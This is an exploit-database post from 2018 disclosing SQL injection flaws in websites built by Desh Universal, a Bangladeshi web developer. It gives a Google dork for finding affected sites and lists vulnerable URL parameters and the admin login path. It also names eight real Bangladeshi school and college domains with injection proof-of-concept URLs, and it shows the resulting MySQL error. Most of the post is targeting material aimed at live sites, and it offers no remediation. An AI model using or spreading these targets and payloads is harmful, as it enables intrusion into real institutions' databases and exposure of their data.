facebook facebook twitter rss

Developed by Desh Universal (Pvt.) Limited Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-10-2018

# Exploit Title : Developed by Desh Universal (Pvt.) Limited Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : deshuniversal.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090018

#################################################################################################

# Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.''

# Exploits :

/teacher?page=[SQL Injection]

/all-teacher-view?dept_id=[SQL Injection]

/achievement-events?eventid=[SQL Injection]

/text-file?file_id=[SQL Injection]

/teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection]

/event-details?events-id=[SQL Injection]

/notice-details?nid=[SQL Injection]

/messages?messageid=[SQL Injection]

/text-file?file_id=[SQL Injection]

/details?id=[SQL Injection]

/details?cat-id=[SQL Injection]

/program-subjects?programID=[SQL Injection]

/video-details?vid=[SQL Injection]

# Admin Control Panel Path => /login

It redirects to another links for login with username and pass.

#################################################################################################

# Example Vulnerable Sites =>

1) rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4

2) acps.edu.bd/messages?mid=101%27

3) cpscm.edu.bd/details?id=5%27

4) dcc.edu.bd/notice-details?nid=666%27

5) dcgpsc.edu.bd/details?id=14%27

6) sagc.edu.bd/details-photo?albumID=5%27

7) bbcpsc.edu.bd/details?id=12%27

8) gpcpsc.edu.bd/achievement_details?content_id=16%27

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :